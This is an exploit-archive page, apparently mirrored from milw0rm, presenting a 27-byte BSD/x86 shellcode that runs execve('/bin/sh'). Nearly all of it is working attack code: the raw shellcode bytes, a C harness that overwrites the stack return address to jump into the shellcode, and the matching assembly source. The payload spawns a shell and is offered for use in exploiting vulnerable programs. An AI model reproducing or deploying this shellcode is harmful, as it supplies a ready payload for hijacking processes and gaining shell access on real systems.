[] NeoSense
E X P L O I T S
title author type platform port cve id

BSD/x86 - execve(/bin/sh) Shellcode (27 bytes)

Author: n0gada
type: 
platform: bsd_x86
port: 27.0
date_added: 2004-09-25 
date_updated: 2017-08-22 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 
/* execve_sh.c by n0gada
   27 bytes.
*/
#include <stdio.h>

char shellcode[]=
"\xeb\x0d\x5f\x31\xc0\x50\x89\xe2"
"\x52\x57\x54\xb0\x3b\xcd\x80\xe8"
"\xee\xff\xff\xff/bin/sh";

int main(void)
{
 int *ret;

	printf("%d\n",strlen(shellcode));
	ret = (int *)&ret+2;
	*ret = (int)shellcode;

return 0;

}

/*********************************************
execve_sh.s

	.globl main
	main:
		jmp strings
	start:
		pop %edi
		xorl %eax,%eax
		push %eax
		movl %esp,%edx
		push %edx
		push %edi
		push %esp
		movb $0x3b,%al
		int $0x80

	strings: call start
		.string "/bin/sh"

*********************************************/

// milw0rm.com [2004-09-26]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.